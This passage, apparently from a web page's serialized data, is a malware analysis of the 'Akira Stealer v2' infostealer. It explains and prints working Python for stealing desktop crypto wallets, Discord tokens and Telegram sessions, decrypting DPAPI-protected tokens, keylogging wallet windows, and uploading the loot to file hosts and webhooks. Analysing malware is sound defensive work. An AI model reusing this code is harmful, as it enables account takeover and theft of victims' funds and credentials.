\"exodus.wallet\")],\n",[1588,14030,14031],{"class":1590,"line":1831},[1588,14032,14033],{},"    [\"AtomicWallet\", 
os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n",[1588,14035,14036],{"class":1590,"line":2135},[1588,14037,14038],{},"    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n",[1588,14040,14041],{"class":1590,"line":2141},[1588,14042,14043],{},"    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n",[1588,14045,14046],{"class":1590,"line":2147},[1588,14047,14048],{},"    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n",[1588,14050,14051],{"class":1590,"line":2153},[1588,14052,13933],{},[1588,14054,14055],{"class":1590,"line":2159},[1588,14056,14057],{},"for name, path in walletsDesktop:\n",[1588,14059,14060],{"class":1590,"line":2165},[1588,14061,14062],{},"    if os.path.isdir(path):\n",[1588,14064,14065],{"class":1590,"line":11039},[1588,14066,14067],{},"        Utils.TaskKill(name.lower())\n",[1588,14069,14070],{"class":1590,"line":11045},[1588,14071,14072],{},"        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n",[1588,14074,14075],{"class":1590,"line":11051},[1588,14076,14077],{},"        shutil.copytree(path, dest, dirs_exist_ok=True)\n",[1588,14079,14080],{"class":1590,"line":11057},[1588,14081,14082],{},"        data.desktop_wallets_count += 1\n",[2738,14084,14085,14098],{},[2741,14086,14087,14090,14091,2289,14094,14097],{},[1736,14088,14089],{},"Data stolen",": Keystore files (",[1524,14092,14093],{},"*.dat",[1524,14095,14096],{},"*.json","), private key exports, wallet configuration and transaction history.",[2741,14099,14100,14103],{},[1736,14101,14102],{},"Benefit",": Offline wallet contents usable by the attacker to authorize transactions.",[1671,14105,14107],{"id":14106},"_783-discord-token-harvest","7.8.3 Discord Token Harvest",[806,14109,1677],{},[806,14111,14112],{},"Discord tokens are authentication artifacts—essentially long-lived bearer tokens—that can grant full access to a 
user’s account without requiring their credentials or MFA. Akira exploits this by scanning browser and app data folders for tokens stored by various Discord clients, including Discord Stable, Canary, PTB (Public Test Build), and even modified forks like Lightcord.",[806,14114,14115],{},"The technique targets LevelDB files under the application's Local Storage, where authentication tokens often remain in plaintext. Using regular expressions, the malware scans these .log and .ldb files for patterns that match either regular user tokens or MFA-enabled tokens.",[806,14117,14118],{},"To increase reliability and reduce noise, Akira includes a validation step: it sends a test request to Discord’s /users/@me endpoint using each harvested token. Only tokens that successfully authenticate (HTTP 200) are exfiltrated via webhook—typically to a Discord channel under attacker control.",[806,14120,14121],{},"This method allows attackers to hijack Discord accounts in real time, impersonate the victim, scrape DMs and guilds, or deploy further malware through social engineering—all without triggering login alerts.",[1545,14123,14125],{"className":10501,"code":14124,"language":10503,"meta":863,"style":863},"import re, requests\npatterns = [\n    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n]\ndef harvest_discord(base, webhook_url):\n    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n    for file in os.listdir(db_dir):\n        if file.endswith(('.log', '.ldb')):\n            for line in open(os.path.join(db_dir, file), errors='ignore'):\n                for pat in patterns:\n                    for token in re.findall(pat, line):\n                        # Verify token\n                        h = {\"Authorization\": token}\n                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n                        if r.status_code == 200:\n                    
        uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n                            requests.post(webhook_url, json=payload)\n",[1524,14126,14127,14132,14137,14142,14147,14151,14156,14161,14166,14171,14176,14181,14186,14191,14196,14201,14206,14211,14216],{"__ignoreMap":863},[1588,14128,14129],{"class":1590,"line":1591},[1588,14130,14131],{},"import re, requests\n",[1588,14133,14134],{"class":1590,"line":864},[1588,14135,14136],{},"patterns = [\n",[1588,14138,14139],{"class":1590,"line":1814},[1588,14140,14141],{},"    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n",[1588,14143,14144],{"class":1590,"line":1831},[1588,14145,14146],{},"    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n",[1588,14148,14149],{"class":1590,"line":2135},[1588,14150,13933],{},[1588,14152,14153],{"class":1590,"line":2141},[1588,14154,14155],{},"def harvest_discord(base, webhook_url):\n",[1588,14157,14158],{"class":1590,"line":2147},[1588,14159,14160],{},"    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n",[1588,14162,14163],{"class":1590,"line":2153},[1588,14164,14165],{},"    for file in os.listdir(db_dir):\n",[1588,14167,14168],{"class":1590,"line":2159},[1588,14169,14170],{},"        if file.endswith(('.log', '.ldb')):\n",[1588,14172,14173],{"class":1590,"line":2165},[1588,14174,14175],{},"            for line in open(os.path.join(db_dir, file), errors='ignore'):\n",[1588,14177,14178],{"class":1590,"line":11039},[1588,14179,14180],{},"                for pat in patterns:\n",[1588,14182,14183],{"class":1590,"line":11045},[1588,14184,14185],{},"                    for token in re.findall(pat, line):\n",[1588,14187,14188],{"class":1590,"line":11051},[1588,14189,14190],{},"                        # Verify token\n",[1588,14192,14193],{"class":1590,"line":11057},[1588,14194,14195],{},"                        h = {\"Authorization\": 
token}\n",[1588,14197,14198],{"class":1590,"line":11063},[1588,14199,14200],{},"                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n",[1588,14202,14203],{"class":1590,"line":11069},[1588,14204,14205],{},"                        if r.status_code == 200:\n",[1588,14207,14208],{"class":1590,"line":11075},[1588,14209,14210],{},"                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n",[1588,14212,14213],{"class":1590,"line":11081},[1588,14214,14215],{},"                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n",[1588,14217,14218],{"class":1590,"line":11087},[1588,14219,14220],{},"                            requests.post(webhook_url, json=payload)\n",[2738,14222,14223],{},[2741,14224,14225,14228],{},[1736,14226,14227],{},"Validation",": Only posts valid tokens, preventing stale JWTs from being sent.",[1671,14230,14232],{"id":14231},"_784-telegram-session-files","7.8.4 Telegram Session Files",[806,14234,1677],{},[806,14236,14237,14239],{},[1736,14238,13857],{}," Telegram Desktop/TData",[1545,14241,14243],{"className":10501,"code":14242,"language":10503,"meta":863,"style":863},"def steal_telegram(tdata_path, dest_root):\n    if os.path.exists(tdata_path):\n        Utils.TaskKill(\"telegram.exe\")\n        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n        data.has_telegram = True\n",[1524,14244,14245,14250,14255,14260,14265,14270],{"__ignoreMap":863},[1588,14246,14247],{"class":1590,"line":1591},[1588,14248,14249],{},"def steal_telegram(tdata_path, dest_root):\n",[1588,14251,14252],{"class":1590,"line":864},[1588,14253,14254],{},"    if os.path.exists(tdata_path):\n",[1588,14256,14257],{"class":1590,"line":1814},[1588,14258,14259],{},"        Utils.TaskKill(\"telegram.exe\")\n",[1588,14261,14262],{"class":1590,"line":1831},[1588,14263,14264],{},"        dest = 
os.path.join(dest_root, \"Wallets\", \"Telegram\")\n",[1588,14266,14267],{"class":1590,"line":2135},[1588,14268,14269],{},"        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n",[1588,14271,14272],{"class":1590,"line":2141},[1588,14273,14274],{},"        data.has_telegram = True\n",[2738,14276,14277,14290],{},[2741,14278,14279,2545,14282,14285,14286,14289],{},[1736,14280,14281],{},"Files",[1524,14283,14284],{},"tdata"," folder containing session keys, ",[1524,14287,14288],{},"D877F..."," folder with secret/unsecret files.",[2741,14291,14292,14295],{},[1736,14293,14294],{},"Use",": Load into attacker’s Telegram client for full account access.",[1671,14297,14299],{"id":14298},"_785-live-wallet-keylogging","7.8.5 Live Wallet Keylogging",[806,14301,1677],{},[806,14303,14304],{},"Cryptocurrency wallets are prime targets for modern info-stealers. Akira includes a live keylogger tailored specifically to steal wallet credentials such as seed phrases, private keys, and passwords at the moment of entry. Unlike generic keyloggers, this one activates only when a known wallet window is detected, dramatically reducing noise and increasing efficiency.",[806,14306,14307],{},"The module monitors active window titles and compares them against a hardcoded list of popular wallet apps like MetaMask, Phantom, Atomic Wallet, and others. Once a matching window is in focus, it begins recording keystrokes via system-wide keyboard hooks. When the user presses Enter, the module immediately captures the current clipboard contents—knowing that users often copy secrets during wallet setup or login—and sends both the typed input and clipboard data to the attacker's webhook. 
This approach is extremely effective because it combines two attack vectors:",[2738,14309,14310,14313],{},[2741,14311,14312],{},"Context-aware keylogging, to capture sensitive wallet inputs only when relevant.",[2741,14314,14315],{},"Clipboard hijacking, to extract copied recovery phrases or destination addresses before they’re pasted.",[806,14317,14318],{},"Together, these methods allow attackers to silently compromise wallets in real time, even without browser access or file exfiltration.",[1545,14320,14322],{"className":10501,"code":14321,"language":10503,"meta":863,"style":863},"import keyboard, pyperclip\n\nclass WalletKeylogger:\n    def __init__(self, wallet_titles):\n        self.buf = \"\"\n        keyboard.on_release(self.capture)\n        self.wallet_titles = wallet_titles\n\n    def capture(self, event):\n        title = pygetwindow.getActiveWindow().title\n        if any(w in title for w in self.wallet_titles):\n            if event.name == 'enter':\n                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n                send_to_webhook(data)\n                self.buf = \"\"\n            else:\n                self.buf += event.name\n",[1524,14323,14324,14329,14333,14338,14343,14348,14353,14358,14362,14367,14372,14377,14382,14387,14392,14397,14402],{"__ignoreMap":863},[1588,14325,14326],{"class":1590,"line":1591},[1588,14327,14328],{},"import keyboard, pyperclip\n",[1588,14330,14331],{"class":1590,"line":864},[1588,14332,9865],{"emptyLinePlaceholder":508},[1588,14334,14335],{"class":1590,"line":1814},[1588,14336,14337],{},"class WalletKeylogger:\n",[1588,14339,14340],{"class":1590,"line":1831},[1588,14341,14342],{},"    def __init__(self, wallet_titles):\n",[1588,14344,14345],{"class":1590,"line":2135},[1588,14346,14347],{},"        self.buf = \"\"\n",[1588,14349,14350],{"class":1590,"line":2141},[1588,14351,14352],{},"        keyboard.on_release(self.capture)\n",[1588,14354,14355],{"class":1590,"line":2147},[1588,14356,14357],{},"      
  self.wallet_titles = wallet_titles\n",[1588,14359,14360],{"class":1590,"line":2153},[1588,14361,9865],{"emptyLinePlaceholder":508},[1588,14363,14364],{"class":1590,"line":2159},[1588,14365,14366],{},"    def capture(self, event):\n",[1588,14368,14369],{"class":1590,"line":2165},[1588,14370,14371],{},"        title = pygetwindow.getActiveWindow().title\n",[1588,14373,14374],{"class":1590,"line":11039},[1588,14375,14376],{},"        if any(w in title for w in self.wallet_titles):\n",[1588,14378,14379],{"class":1590,"line":11045},[1588,14380,14381],{},"            if event.name == 'enter':\n",[1588,14383,14384],{"class":1590,"line":11051},[1588,14385,14386],{},"                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n",[1588,14388,14389],{"class":1590,"line":11057},[1588,14390,14391],{},"                send_to_webhook(data)\n",[1588,14393,14394],{"class":1590,"line":11063},[1588,14395,14396],{},"                self.buf = \"\"\n",[1588,14398,14399],{"class":1590,"line":11069},[1588,14400,14401],{},"            else:\n",[1588,14403,14404],{"class":1590,"line":11075},[1588,14405,14406],{},"                self.buf += event.name\n",[2738,14408,14409,14415],{},[2741,14410,14411,14414],{},[1736,14412,14413],{},"Trigger list",": Window titles including “MetaMask”, “Phantom”, “Atomic Wallet”, etc.",[2741,14416,14417,14420],{},[1736,14418,14419],{},"Clipboard",": Captures copied seeds or private keys.",[1671,14422,14424],{"id":14423},"_786-packaging-exfiltration","7.8.6 Packaging & Exfiltration",[806,14426,1677],{},[806,14428,14429],{},"After collecting browser data, credentials, wallet information, and tokens, Akira proceeds to consolidate and exfiltrate the loot in a highly automated and stealthy manner. This stage marks the final step in the infection chain, and it’s optimized for reliability and minimal forensic footprint. First, all collected data—including browser dumps, logs, and keylogged wallet information—is compressed into a ZIP archive. 
This ensures the full dataset can be transferred as a single payload. The archive is then uploaded to multiple public file-sharing services such as GoFile, File.io, or Oshi.at, depending on availability. These platforms provide anonymous, temporary hosting, and are often used to bypass corporate firewalls or reputation-based blocking. A structured report is simultaneously generated and sent to the attacker via a Discord or Telegram webhook. It includes summary statistics—how many wallets were found, how many tokens were valid, and a direct link to the stolen data. This gives attackers a quick overview of the target’s value without opening the archive.",[806,14431,14432],{},"Finally, the malware deletes the temporary folder and the archive from disk, effectively removing local forensic evidence. By the time a defender discovers the infection, the data is already gone—and often irretrievable.",[1545,14434,14436],{"className":10501,"code":14435,"language":10503,"meta":863,"style":863},"# 1) ZIP everything (including Wallets folder)\nzip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n# 2) Attempt upload to primary & fallback services\nurl = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n# 3) Report summary\nembed = {\n    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n    \"fields\": [\n        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n    ]\n}\nWebhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n# 4) Cleanup local folder & 
ZIP\nUtils.clear_client_folder()\n",[1524,14437,14438,14443,14448,14453,14458,14463,14468,14473,14478,14483,14488,14493,14498,14503,14508,14512,14517,14522],{"__ignoreMap":863},[1588,14439,14440],{"class":1590,"line":1591},[1588,14441,14442],{},"# 1) ZIP everything (including Wallets folder)\n",[1588,14444,14445],{"class":1590,"line":864},[1588,14446,14447],{},"zip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n",[1588,14449,14450],{"class":1590,"line":1814},[1588,14451,14452],{},"# 2) Attempt upload to primary & fallback services\n",[1588,14454,14455],{"class":1590,"line":1831},[1588,14456,14457],{},"url = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[1588,14459,14460],{"class":1590,"line":2135},[1588,14461,14462],{},"# 3) Report summary\n",[1588,14464,14465],{"class":1590,"line":2141},[1588,14466,14467],{},"embed = {\n",[1588,14469,14470],{"class":1590,"line":2147},[1588,14471,14472],{},"    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n",[1588,14474,14475],{"class":1590,"line":2153},[1588,14476,14477],{},"    \"fields\": [\n",[1588,14479,14480],{"class":1590,"line":2159},[1588,14481,14482],{},"        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n",[1588,14484,14485],{"class":1590,"line":2165},[1588,14486,14487],{},"        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n",[1588,14489,14490],{"class":1590,"line":11039},[1588,14491,14492],{},"        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n",[1588,14494,14495],{"class":1590,"line":11045},[1588,14496,14497],{},"        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n",[1588,14499,14500],{"class":1590,"line":11051},[1588,14501,14502],{},"        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n",[1588,14504,14505],{"class":1590,"line":11057},[1588,14506,14507],{},"    
]\n",[1588,14509,14510],{"class":1590,"line":11063},[1588,14511,8430],{},[1588,14513,14514],{"class":1590,"line":11069},[1588,14515,14516],{},"Webhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n",[1588,14518,14519],{"class":1590,"line":11075},[1588,14520,14521],{},"# 4) Cleanup local folder & ZIP\n",[1588,14523,14524],{"class":1590,"line":11081},[1588,14525,13708],{},[810,14527,14529,14530,2772],{"id":14528},"_79-discord-and-telegram-token-theft-class-discord","7.9. Discord and Telegram Token Theft (Class: ",[1524,14531,7358],{},[806,14533,1536],{},[806,14535,14536,14537,14539],{},"Akira Stealer v2’s ",[1736,14538,7358],{}," class executes a highly parallelized, multi-stage process to harvest both Discord authorization tokens and Telegram session data. Below, we dissect each component with precise code references and illustrative examples.",[1671,14541,14543],{"id":14542},"_791-initialization-path-enumeration","7.9.1 Initialization & Path Enumeration",[806,14545,1677],{},[806,14547,14548],{},"Upon instantiation, the constructor builds two sets of target paths:",[1545,14550,14552],{"className":10501,"code":14551,"language":10503,"meta":863,"style":863},"# Discord client LevelDB directories\ndiscord_paths = [\n    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n    ...\n]\n\n# Chromium-based browser LevelDB directories\nbrowserPaths = [\n    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n    ...\n]\n",[1524,14553,14554,14559,14564,14569,14574,14578,14582,14586,14591,14596,14601,14606,14610],{"__ignoreMap":863},[1588,14555,14556],{"class":1590,"line":1591},[1588,14557,14558],{},"# Discord client LevelDB directories\n",[1588,14560,14561],{"class":1590,"line":864},[1588,14562,14563],{},"discord_paths = 
[\n",[1588,14565,14566],{"class":1590,"line":1814},[1588,14567,14568],{},"    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n",[1588,14570,14571],{"class":1590,"line":1831},[1588,14572,14573],{},"    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n",[1588,14575,14576],{"class":1590,"line":2135},[1588,14577,9855],{},[1588,14579,14580],{"class":1590,"line":2141},[1588,14581,13933],{},[1588,14583,14584],{"class":1590,"line":2147},[1588,14585,9865],{"emptyLinePlaceholder":508},[1588,14587,14588],{"class":1590,"line":2153},[1588,14589,14590],{},"# Chromium-based browser LevelDB directories\n",[1588,14592,14593],{"class":1590,"line":2159},[1588,14594,14595],{},"browserPaths = [\n",[1588,14597,14598],{"class":1590,"line":2165},[1588,14599,14600],{},"    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n",[1588,14602,14603],{"class":1590,"line":11039},[1588,14604,14605],{},"    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n",[1588,14607,14608],{"class":1590,"line":11045},[1588,14609,9855],{},[1588,14611,14612],{"class":1590,"line":11051},[1588,14613,13933],{},[2738,14615,14616,14625],{},[2741,14617,14618,14621,14622,2786],{},[1736,14619,14620],{},"Discord Paths"," target official and unofficial Discord clients under ",[1524,14623,14624],{},"%APPDATA%",[2741,14626,14627,14630],{},[1736,14628,14629],{},"Browser Paths"," cover popular browsers’ user data folders, including subfolders for local storage and extensions.",[806,14632,14633],{},"Threads are spawned for each entry:",[1545,14635,14637],{"className":10501,"code":14636,"language":10503,"meta":863,"style":863},"for patt in browserPaths:\n    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n    t.start()\nfor patt in discord_paths:\n    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n    
t.start()\n",[1524,14638,14639,14644,14649,14654,14659,14664],{"__ignoreMap":863},[1588,14640,14641],{"class":1590,"line":1591},[1588,14642,14643],{},"for patt in browserPaths:\n",[1588,14645,14646],{"class":1590,"line":864},[1588,14647,14648],{},"    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n",[1588,14650,14651],{"class":1590,"line":1814},[1588,14652,14653],{},"    t.start()\n",[1588,14655,14656],{"class":1590,"line":1831},[1588,14657,14658],{},"for patt in discord_paths:\n",[1588,14660,14661],{"class":1590,"line":2135},[1588,14662,14663],{},"    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n",[1588,14665,14666],{"class":1590,"line":2141},[1588,14667,14653],{},[806,14669,14670],{},"This threading model maximizes I/O throughput, probing dozens of directories concurrently.",[1671,14672,14674],{"id":14673},"_792-token-extraction-logic","7.9.2 Token Extraction Logic",[806,14676,1677],{},[806,14678,14679],{},[1736,14680,14681],{},"Plaintext Token Scraping from Browsers",[806,14683,14684,14687,14688,5611,14691,14694],{},[1524,14685,14686],{},"get_btoken(path, arg)"," navigates to each LevelDB folder and inspects ",[1524,14689,14690],{},".log",[1524,14692,14693],{},".ldb"," files:",[1545,14696,14698],{"className":10501,"code":14697,"language":10503,"meta":863,"style":863},"for file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n                tokens = re.findall(regex, line)\n                for token in tokens:\n                    self.tokens.append(token)\n                    self.cehckToken(token)\n",[1524,14699,14700,14705,14710,14715,14720,14725,14730,14735],{"__ignoreMap":863},[1588,14701,14702],{"class":1590,"line":1591},[1588,14703,14704],{},"for file in os.listdir(path + 
arg):\n",[1588,14706,14707],{"class":1590,"line":864},[1588,14708,14709],{},"    if file.endswith((\".log\", \".ldb\")):\n",[1588,14711,14712],{"class":1590,"line":1814},[1588,14713,14714],{},"        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n",[1588,14716,14717],{"class":1590,"line":1831},[1588,14718,14719],{},"            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n",[1588,14721,14722],{"class":1590,"line":2135},[1588,14723,14724],{},"                tokens = re.findall(regex, line)\n",[1588,14726,14727],{"class":1590,"line":2141},[1588,14728,14729],{},"                for token in tokens:\n",[1588,14731,14732],{"class":1590,"line":2147},[1588,14733,14734],{},"                    self.tokens.append(token)\n",[1588,14736,14737],{"class":1590,"line":2153},[1588,14738,14739],{},"                    self.cehckToken(token)\n",[2738,14741,14742,14751,14759],{},[2741,14743,14744,14750],{},[1736,14745,14746,14747],{},"Regex ",[1524,14748,14749],{},"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}"," matches standard Discord tokens.",[2741,14752,14753,14758],{},[1736,14754,14746,14755],{},[1524,14756,14757],{},"mfa\\.[\\w-]{80,95}"," captures MFA tokens.",[2741,14760,14761,14762,14765],{},"Deduplication is implicit: tokens stored in ",[1524,14763,14764],{},"self.tokens"," before validation.",[806,14767,14768],{},[1736,14769,14770],{},"Encrypted Token Decryption in Discord Client",[806,14772,14773,14774,4966,14776,14778,14779,14782],{},"Discord’s client encrypts Local Storage entries under DPAPI, prefaced by ",[1524,14775,12511],{},[1524,14777,12514],{},". 
",[1524,14780,14781],{},"get_discord(path, arg)"," handles this:",[1545,14784,14786],{"className":10501,"code":14785,"language":10503,"meta":863,"style":863},"# Read Local State to obtain encrypted master key\nwith open(path + \"/Local State\", 'r') as f:\n    local_state = json.load(f)\nencrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\nmaster_key = self.CryptUnprotectData(encrypted_key)\n\n# Iterate LevelDB files for Base64 payloads\nfor file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\"):\n            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n                ciphertext = b64decode(token_part)\n                token = self.decrypt_value(ciphertext, master_key)\n                self.tokens.append(token)\n                self.cehckToken(token)\n",[1524,14787,14788,14793,14798,14802,14807,14812,14816,14821,14825,14829,14834,14839,14844,14849,14854],{"__ignoreMap":863},[1588,14789,14790],{"class":1590,"line":1591},[1588,14791,14792],{},"# Read Local State to obtain encrypted master key\n",[1588,14794,14795],{"class":1590,"line":864},[1588,14796,14797],{},"with open(path + \"/Local State\", 'r') as f:\n",[1588,14799,14800],{"class":1590,"line":1814},[1588,14801,13109],{},[1588,14803,14804],{"class":1590,"line":1831},[1588,14805,14806],{},"encrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\n",[1588,14808,14809],{"class":1590,"line":2135},[1588,14810,14811],{},"master_key = self.CryptUnprotectData(encrypted_key)\n",[1588,14813,14814],{"class":1590,"line":2141},[1588,14815,9865],{"emptyLinePlaceholder":508},[1588,14817,14818],{"class":1590,"line":2147},[1588,14819,14820],{},"# Iterate LevelDB files for Base64 payloads\n",[1588,14822,14823],{"class":1590,"line":2153},[1588,14824,14704],{},[1588,14826,14827],{"class":1590,"line":2159},[1588,14828,14709],{},[1588,14830,14831],{"class":1590,"line":2165},[1588,14832,14833],{},"  
      for line in open(f\"{path}{arg}/{file}\"):\n",[1588,14835,14836],{"class":1590,"line":11039},[1588,14837,14838],{},"            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n",[1588,14840,14841],{"class":1590,"line":11045},[1588,14842,14843],{},"                ciphertext = b64decode(token_part)\n",[1588,14845,14846],{"class":1590,"line":11051},[1588,14847,14848],{},"                token = self.decrypt_value(ciphertext, master_key)\n",[1588,14850,14851],{"class":1590,"line":11057},[1588,14852,14853],{},"                self.tokens.append(token)\n",[1588,14855,14856],{"class":1590,"line":11063},[1588,14857,14858],{},"                self.cehckToken(token)\n",[2738,14860,14861,14870],{},[2741,14862,14863,14866,14867,14869],{},[1736,14864,14865],{},"Master Key Recovery",": Strips the 5-byte DPAPI header, then calls ",[1524,14868,13175],{}," (wrapping Windows DPAPI) to decrypt the AES-GCM key.",[2741,14871,14872,14875,14876,14879,14880,14883,14884],{},[1736,14873,14874],{},"Payload Parsing",": Tokens are prefixed with ",[1524,14877,14878],{},"dQw4w9WgXcQ:"," (an attacker-chosen marker). 
After Base64 decoding, ",[1524,14881,14882],{},"decrypt_value()"," splits IV and ciphertext:",[1545,14885,14887],{"className":10501,"code":14886,"language":10503,"meta":863,"style":863},"def decrypt\\_value(buff, master\\_key):\niv = buff\\[3:15]\npayload = buff\\[15:]\ncipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\nreturn cipher.decrypt(payload)\\[:-16].decode()\n",[1524,14888,14889,14894,14899,14904,14909],{"__ignoreMap":863},[1588,14890,14891],{"class":1590,"line":1591},[1588,14892,14893],{},"def decrypt\\_value(buff, master\\_key):\n",[1588,14895,14896],{"class":1590,"line":864},[1588,14897,14898],{},"iv = buff\\[3:15]\n",[1588,14900,14901],{"class":1590,"line":1814},[1588,14902,14903],{},"payload = buff\\[15:]\n",[1588,14905,14906],{"class":1590,"line":1831},[1588,14907,14908],{},"cipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\n",[1588,14910,14911],{"class":1590,"line":2135},[1588,14912,14913],{},"return cipher.decrypt(payload)\\[:-16].decode()\n",[1671,14915,14917],{"id":14916},"_793-token-validation-exfiltration","7.9.3 Token Validation & Exfiltration",[806,14919,1677],{},[806,14921,14922],{},"Each extracted token is validated via live API call:",[1545,14924,14927],{"className":14925,"code":14926,"language":916},[1548],"headers = {\"Authorization\": token}\nresp = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=headers)\nif resp.status_code == 200:\n    self.cehckToken(token)\n",[1524,14928,14926],{"__ignoreMap":863},[2738,14930,14931],{},[2741,14932,14933,2289,14936,14939,14940,14943,14944],{},[1736,14934,14935],{},"On success",[1524,14937,14938],{},"cehckToken()"," determines whether to send via Telegram (",[1524,14941,14942],{},"useTg=True",") or Discord webhook:",[1545,14945,14947],{"className":10501,"code":14946,"language":10503,"meta":863,"style":863},"if 
useTg:\nself.sendTokenTg(token)\nelse:\nself.send\\_embed(token)\n",[1524,14948,14949,14954,14959,14964],{"__ignoreMap":863},[1588,14950,14951],{"class":1590,"line":1591},[1588,14952,14953],{},"if useTg:\n",[1588,14955,14956],{"class":1590,"line":864},[1588,14957,14958],{},"self.sendTokenTg(token)\n",[1588,14960,14961],{"class":1590,"line":1814},[1588,14962,14963],{},"else:\n",[1588,14965,14966],{"class":1590,"line":1831},[1588,14967,14968],{},"self.send\\_embed(token)\n",[2738,14970,14971],{},[2741,14972,14973,14978],{},[1736,14974,14975],{},[1524,14976,14977],{},"send_embed"," crafts a rich Discord embed containing user metadata (username, discriminator, email, Nitro status, billing info) using fields from",[1545,14980,14983],{"className":14981,"code":14982,"language":916},[1548],"user_json = requests.get(...).json()\nusername = user_json[\"username\"]\nid = user_json[\"id\"]\n# embed fields: token, email, phone, IP, flags, Nitro, billing\n",[1524,14984,14982],{"__ignoreMap":863},[2738,14986,14987],{},[2741,14988,14989,14994],{},[1736,14990,14991],{},[1524,14992,14993],{},"sendTokenTg"," sends a plain-text summary over Telegram API.",[1671,14996,14998],{"id":14997},"_794-telegram-session-harvesting","7.9.4 Telegram Session Harvesting",[806,15000,1677],{},[806,15002,15003],{},"Beyond Discord tokens, the stealer grabs Telegram Desktop sessions:",[1545,15005,15007],{"className":10501,"code":15006,"language":10503,"meta":863,"style":863},"@staticmethod\ndef steal_telegram():\n    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n    Utils.TaskKill(\"telegram.exe\")\n    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[1524,15008,15009,15013,15018,15023,15028],{"__ignoreMap":863},[1588,15010,15011],{"class":1590,"line":1591},[1588,15012,10991],{},[1588,15014,15015],{"class":1590,"line":864},[1588,15016,15017],{},"def steal_telegram():\n",[1588,15019,15020],{"class":1590,"line":1814},[1588,15021,15022],{},"    src = 
